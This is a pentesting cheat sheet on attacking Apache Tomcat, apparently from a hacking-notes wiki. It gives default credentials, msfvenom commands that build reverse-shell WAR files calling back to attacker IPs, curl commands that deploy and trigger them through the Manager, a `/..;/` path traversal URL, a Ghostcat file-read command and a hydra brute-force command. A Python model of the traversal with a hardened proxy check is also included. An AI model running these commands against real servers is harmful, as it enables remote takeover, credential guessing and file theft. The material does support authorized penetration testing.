# Apache Tomcat

## Introduction

Apache Tomcat is a Java-based HTTP web server and servlet container that deploys Web Application Archive (WAR) files; the Tomcat Manager Application is its built-in web interface for deploying them. WAR files contain Java Servlets and JavaServer Pages (JSP) that add functionality to the application.

If an attacker gains access to the Tomcat Manager Application through [default credentials](https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown) such as `tomcat:s3cret` or weak credentials, the attacker can achieve RCE by uploading a malicious WAR file.

## Reverse shell

You can use msfvenom to create your own `.war` file that contains a reverse shell.

```bash
# Linux
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.122 LPORT=443 -f war -o revshell.war
# Windows
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.83 LPORT=9002 -f war > revshell.war
```

Then, from `/manager/html`, deploy the WAR file; once the deployed application is requested, the reverse shell connects back to you.

![Tomcat Manager App](/files/7UIvJNgf0jSa4mRG7ony)

### Upload via curl

If the Tomcat server is **misconfigured** or you have access to the Tomcat service from **localhost**, you can deploy and undeploy a reverse shell through the Manager's text interface without using the web interface.

```bash
# Deploy through the text interface (Tomcat 7+: /manager/text/; the account needs the manager-script role).
# The URL is quoted so the shell does not expand '?' and '='.
curl --user '<USER>:<PASSWORD>' --upload-file shell.war "http://<TARGET_IP>:8080/manager/text/deploy?path=/shell"
curl "http://<TARGET_IP>:8080/shell/" # Requesting the deployed app triggers the reverse shell

# Undeploy (same path as used in the deploy step)
curl --user '<USER>:<PASSWORD>' "http://<TARGET_IP>:8080/manager/text/undeploy?path=/shell"
```

## Tomcat path traversal

When Apache Tomcat sits behind a reverse proxy, the proxy treats `..;` as an ordinary path segment, while Tomcat strips the path parameter (everything after `;` in a segment) before normalizing and therefore interprets `/..;/` as `/../`. This parser difference lets an attacker reach Tomcat resources that the reverse proxy mapping is not meant to expose.

```
https://<TARGET_IP>/manager/status/..;/html/
```
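As an added illustration (not code from the original page), the following Python models the parser differential: the proxy keeps `..;` as an opaque segment, while Tomcat strips the path parameter first and then resolves `..`. The function names and the `protected_prefixes` argument are my own; a defender can use the Tomcat-style view to make the proxy's access rule match what Tomcat will actually serve.

```python
"""Model of the /..;/ parser differential between a reverse proxy and Tomcat."""
from urllib.parse import unquote


def _collapse(segments):
    """Resolve '.' and '..' segments (RFC 3986 remove_dot_segments style).
    The trailing slash is dropped; only the resolved path matters for ACLs."""
    out = []
    for seg in segments:
        if seg == "..":
            if out:
                out.pop()
        elif seg not in ("", "."):
            out.append(seg)
    return "/" + "/".join(out)


def proxy_view(path: str) -> str:
    """What a typical reverse proxy believes the path is: '..;' is just an
    odd segment name, so it survives normalization verbatim."""
    return _collapse(unquote(path).split("/"))


def tomcat_view(path: str) -> str:
    """What Tomcat resolves the same request to: the ';param' part of every
    segment is removed *before* dot-segment normalization, so '..;' becomes '..'."""
    segments = [seg.split(";", 1)[0] for seg in unquote(path).split("/")]
    return _collapse(segments)


def bypasses_proxy_rule(path: str, protected_prefixes=("/manager/html",)) -> bool:
    """True when the proxy's prefix rule would let the request through
    while Tomcat would serve a resource under a protected prefix."""
    proxy_blocks = any(proxy_view(path).startswith(p) for p in protected_prefixes)
    tomcat_hits = any(tomcat_view(path).startswith(p) for p in protected_prefixes)
    return tomcat_hits and not proxy_blocks


def hardened_decision(path: str, protected_prefixes=("/manager/html",)) -> bool:
    """Proxy-side check that applies Tomcat's own rules before matching the
    prefix; returns True when the request must be blocked."""
    return any(tomcat_view(path).startswith(p) for p in protected_prefixes)


if __name__ == "__main__":
    # Constructed sample: the proxy exposes /manager/status but not /manager/html.
    for p in ("/manager/status/..;/html/", "/manager/status/../html/"):
        print(p, "->", tomcat_view(p), "bypass:", bypasses_proxy_rule(p))
```

The second sample path (a plain `..`) is normalized identically by both sides, so the proxy rule already catches it; only the `..;` variant slips past the naive prefix check.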

## Ghostcat (CVE-2020-1938)

[CVE-2020-1938](https://github.com/00theway/Ghostcat-CNVD-2020-10487) (Ghostcat) allows an unauthenticated attacker to read web application files from a vulnerable server through the AJP connector on port 8009.

```bash
python3 ajpShooter.py http://<TARGET_IP>:8080 8009 /WEB-INF/web.xml read
```

## Brute forcing

Use this as a last resort: Tomcat's `LockOutRealm` (enabled in the default `server.xml`) locks an account after repeated failed logins, so brute forcing can lock out the account you are after.

```bash
hydra -L <USERS.txt> -P <PASSWORDS.txt> http-get://<TARGET_IP>:8080/manager/html
```

## References

* [Tomcat](https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat)
* [Multiple Ways to Exploit Tomcat Manager](https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/)
* [Tomcat path traversal via reverse proxy mapping](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/)
* [Breaking Parser Logic!](https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf)

